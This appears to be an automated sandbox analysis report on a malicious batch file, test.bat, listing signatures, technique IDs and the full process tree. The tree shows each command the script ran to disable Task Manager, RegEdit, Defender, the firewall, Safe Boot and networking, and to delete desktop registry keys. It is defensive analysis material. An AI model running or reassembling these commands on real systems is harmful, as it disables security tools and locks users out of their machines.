0c5924fa33f3005938cf82c64cf548a6a96216c512b7377d13c72d81ecb18969

Resubmissions

28/06/2024, 12:52

240628-p32mkatblq 8

28/06/2024, 12:50

240628-p3b2xazglf 8

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
28/06/2024, 12:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.bat
Size

3KB
MD5

252dfe9f4be7028477c9e5f9c847ce3c
SHA1

62e44423243d9f0c5b51ed889236993880064cd1
SHA256

0c5924fa33f3005938cf82c64cf548a6a96216c512b7377d13c72d81ecb18969
SHA512

1a36e5896cc028acfdfccfb8d57c3c2fb8ea9440a45f0625cc9a001920174c789d78ce36ac30decb05dd50151a5a9bec7fa420717a39f7aff5a531c282f0c304

Score

8^/10

evasion persistence privilege_escalation

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2688	netsh.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2108	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2744	2108	cmd.exe	29
PID 2108 wrote to memory of 2744	2108	cmd.exe	29
PID 2108 wrote to memory of 2744	2108	cmd.exe	29
PID 2108 wrote to memory of 2852	2108	cmd.exe	30
PID 2108 wrote to memory of 2852	2108	cmd.exe	30
PID 2108 wrote to memory of 2852	2108	cmd.exe	30
PID 2108 wrote to memory of 2416	2108	cmd.exe	31
PID 2108 wrote to memory of 2416	2108	cmd.exe	31
PID 2108 wrote to memory of 2416	2108	cmd.exe	31
PID 2108 wrote to memory of 2888	2108	cmd.exe	32
PID 2108 wrote to memory of 2888	2108	cmd.exe	32
PID 2108 wrote to memory of 2888	2108	cmd.exe	32
PID 2108 wrote to memory of 2340	2108	cmd.exe	33
PID 2108 wrote to memory of 2340	2108	cmd.exe	33
PID 2108 wrote to memory of 2340	2108	cmd.exe	33
PID 2108 wrote to memory of 2404	2108	cmd.exe	34
PID 2108 wrote to memory of 2404	2108	cmd.exe	34
PID 2108 wrote to memory of 2404	2108	cmd.exe	34
PID 2108 wrote to memory of 2900	2108	cmd.exe	35
PID 2108 wrote to memory of 2900	2108	cmd.exe	35
PID 2108 wrote to memory of 2900	2108	cmd.exe	35
PID 2108 wrote to memory of 2100	2108	cmd.exe	36
PID 2108 wrote to memory of 2100	2108	cmd.exe	36
PID 2108 wrote to memory of 2100	2108	cmd.exe	36
PID 2108 wrote to memory of 2680	2108	cmd.exe	37
PID 2108 wrote to memory of 2680	2108	cmd.exe	37
PID 2108 wrote to memory of 2680	2108	cmd.exe	37
PID 2108 wrote to memory of 2776	2108	cmd.exe	38
PID 2108 wrote to memory of 2776	2108	cmd.exe	38
PID 2108 wrote to memory of 2776	2108	cmd.exe	38
PID 2108 wrote to memory of 2792	2108	cmd.exe	39
PID 2108 wrote to memory of 2792	2108	cmd.exe	39
PID 2108 wrote to memory of 2792	2108	cmd.exe	39
PID 2108 wrote to memory of 2796	2108	cmd.exe	40
PID 2108 wrote to memory of 2796	2108	cmd.exe	40
PID 2108 wrote to memory of 2796	2108	cmd.exe	40
PID 2108 wrote to memory of 2812	2108	cmd.exe	41
PID 2108 wrote to memory of 2812	2108	cmd.exe	41
PID 2108 wrote to memory of 2812	2108	cmd.exe	41
PID 2108 wrote to memory of 2804	2108	cmd.exe	42
PID 2108 wrote to memory of 2804	2108	cmd.exe	42
PID 2108 wrote to memory of 2804	2108	cmd.exe	42
PID 2108 wrote to memory of 2780	2108	cmd.exe	43
PID 2108 wrote to memory of 2780	2108	cmd.exe	43
PID 2108 wrote to memory of 2780	2108	cmd.exe	43
PID 2108 wrote to memory of 2708	2108	cmd.exe	44
PID 2108 wrote to memory of 2708	2108	cmd.exe	44
PID 2108 wrote to memory of 2708	2108	cmd.exe	44
PID 2108 wrote to memory of 2932	2108	cmd.exe	45
PID 2108 wrote to memory of 2932	2108	cmd.exe	45
PID 2108 wrote to memory of 2932	2108	cmd.exe	45
PID 2108 wrote to memory of 2748	2108	cmd.exe	46
PID 2108 wrote to memory of 2748	2108	cmd.exe	46
PID 2108 wrote to memory of 2748	2108	cmd.exe	46
PID 2108 wrote to memory of 2076	2108	cmd.exe	47
PID 2108 wrote to memory of 2076	2108	cmd.exe	47
PID 2108 wrote to memory of 2076	2108	cmd.exe	47
PID 2108 wrote to memory of 2668	2108	cmd.exe	48
PID 2108 wrote to memory of 2668	2108	cmd.exe	48
PID 2108 wrote to memory of 2668	2108	cmd.exe	48
PID 2108 wrote to memory of 2836	2108	cmd.exe	49
PID 2108 wrote to memory of 2836	2108	cmd.exe	49
PID 2108 wrote to memory of 2836	2108	cmd.exe	49
PID 2108 wrote to memory of 2588	2108	cmd.exe	50

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  2⤵
  PID:2744
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  PID:2852
- C:\Windows\system32\reg.exe
  REG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v "NoActiveDesktop" /t REG_DWORD /d 00000001 /f
  2⤵
  PID:2416
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network" /v "NoNetSetup" /t REG_DWORD /d 1 /f
  2⤵
  PID:2888
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network" /v "NoNetSetupIDPage" /t REG_DWORD /d 1 /f
  2⤵
  PID:2340
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWinKeys" /t REG_DWORD /d 1 /f
  2⤵
  PID:2404
- C:\Windows\system32\reg.exe
  REG add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "Minimal" /t REG_SZ /d "Disabled" /f
  2⤵
  PID:2900
- C:\Windows\system32\reg.exe
  REG add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "Network" /t REG_SZ /d "Disabled" /f
  2⤵
  PID:2100
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v "DisableWindowsUpdateAccess" /t REG_DWORD /d 1 /f
  2⤵
  PID:2680
- C:\Windows\system32\reg.exe
  REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
  2⤵
  PID:2776
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableCalc /t REG_DWORD /d 1 /f
  2⤵
  PID:2792
- C:\Windows\system32\reg.exe
  reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFileOperation /t REG_DWORD /d 1 /f
  2⤵
  PID:2796
- C:\Windows\system32\reg.exe
  reg add "HKCUSOFTWAREPoliciesMicrosoftWindowsSystem" /v DisableCalculator /t REG_DWORD /d 1 /f
  2⤵
  PID:2812
- C:\Windows\system32\reg.exe
  reg add "HKCUSOFTWAREPoliciesMicrosoftWindowsSystem" /v DisableMSpaint /t REG_DWORD /d 1 /f
  2⤵
  PID:2804
- C:\Windows\system32\reg.exe
  REG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /V DisableControlPanel /T REG_DWORD /D 1 /F
  2⤵
  PID:2780
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:2708
- C:\Windows\system32\netsh.exe
  netsh interface set interface "Ethernet" disable
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2932
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionMMDevicesAudioRender" /v "Disabled" /t REG_DWORD /d 0 /f
  2⤵
  PID:2748
- C:\Windows\system32\reg.exe
  reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:2076
- C:\Windows\system32\reg.exe
  reg add "HKCUSoftwareMicrosoftCommand Processor" /v Autorun /t REG_SZ /d "" /f
  2⤵
  PID:2668
- C:\Windows\system32\reg.exe
  reg delete "HKEY_CURRENT_USERControl PanelDesktop" /f
  2⤵
  PID:2836
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Control Panel\Desktop" /v "ActiveDesktop" /f
  2⤵
  PID:2588
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Control Panel\Desktop" /v "DesktopModules" /f
  2⤵
  PID:2872
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Control Panel\Desktop" /v "MountedDevices" /f
  2⤵
  PID:2736
- C:\Windows\system32\reg.exe
  reg delete "HKCU\Control Panel\Desktop" /v "MyDocuments" /f
  2⤵
  PID:2884
- C:\Windows\system32\reg.exe
  reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
  2⤵
  PID:2844
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:2508
- C:\Windows\system32\netsh.exe
  netsh advfirewall set allprofiles state off
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:2688
- C:\Windows\system32\mode.com
  mode con: cols=25 lines=1
  2⤵
  PID:2236
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USERControl PanelDesktop" /v AutoRun /t REG_SZ /d "cmd.exe /k exit" /f
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir /B *
  2⤵
  PID:2564